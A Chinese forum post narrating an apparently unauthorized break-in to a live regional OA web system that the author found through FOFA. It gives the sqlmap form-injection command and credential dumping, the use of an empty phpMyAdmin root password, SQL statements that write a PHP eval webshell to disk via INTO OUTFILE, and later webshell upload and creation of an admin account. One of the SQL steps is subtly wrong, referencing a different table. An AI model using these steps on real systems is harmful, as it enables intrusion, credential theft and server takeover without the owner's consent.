电脑疯子技术论坛|电脑极客社区

微信扫一扫 分享朋友圈

已有 2591 人浏览分享

实战:渗透测试某地区OA管理系统

[复制链接]
2591 0
前序:
中午太冷跟我老婆打了一会会小游戏 吃了一个小午饭 老婆要去电影去了 也是
无聊打开我的fofa搜到了一个站

看下 家人们:

151744iz0cscyaq90xuuca_看图王.png

看样子这个站挺老了,windows服务器
我们想一下怎么拿下他
二话没说直接丢sqlmap
sqlmap -u url --form

152037tyd4u5wj6pyfffy9_看图王.png

好家伙,存在post注入,root权限,有物理路径可以直接getshell
算了,这不是我的目的 跑一下账号密码
如图:

98_看图王.png

152526xr4qa8tj2fx8txwx_看图王.png

就这样轻轻松松得到了OA管理员的账号密码
这个明文破解不了,所以导致我登陆不上去,这就nmd很头疼了
我随便找了一个用户的账号,密码为空,尝试登陆一下...

152721tfrtxri8s2itttlw_看图王.png

这个站点应该几年之前就淘汰了,思路最重要
我是个小白,大佬可以多多指教
废话不多说,寻找上传点,getshell....

69_看图王.png

用了我九牛二虎功夫....还是没能getshell
作为一个男人我想不能这样就放弃,我扫描了一下目录
妈的 myadmin root 密码为空  我人傻了 白跑了半个点的账号密码...

68_看图王.png

root权限那就直接执行sql命令写文件呗
尝试了一下爆物理路径的方法

1、单引号爆路径 2、错误参数值爆路径,3、Google爆路径,4、测试文件爆路径,5、phpmyadmin
爆路径6、配置文件找路径,7、nginx文件类型错误解析爆路径


67_看图王.png

尝试了一系列方法,结果都已失败告终, 默默地抽了一根烟
想起来了,这破网站还存在目录遍历啊....
给了我点自信,自信即是巅峰,我们就去配置文件找路径

66_看图王.png

在inc文件夹找到了这样一个php文件 家人们看下

65_看图王.png

可以看到网站的物理路径了...其实在这里已经getshell了 直接上传php木马就可以了
为了文章的完整性我们继续,毕竟像我这种小白难的getshell...
可以得知 D:\CGOA\ 这就是物理路径 我们去myadmin 执行以下sql命令
第一步:
CREATE TABLE `mysql`.`cesafe` (`cesafe1` TEXT NOT NULL );

64_看图王.png

第二步:
INSERT INTO `mysql`.`cesafe` (`cesafe1` )VALUES ('<?php @eval($_POST[cesafe])?>');
第三步:
SELECT cesafeFROM study INTO OUTFILE 'D:/CGOA/22php';
这样就给一句话木马写进去了 我们链接一下看下....

63_看图王.png

上传大马whoami 看下

62_看图王.png

管理员权限,我们看下3389端口是否开放

61_看图王.png

添加管理员直接提权服务器...结束

您需要登录后才可以回帖 登录 | 注册

本版积分规则

1

关注

0

粉丝

9021

主题
精彩推荐
热门资讯
网友晒图
图文推荐

Powered by Pcgho! X3.4

© 2008-2022 Pcgho Inc.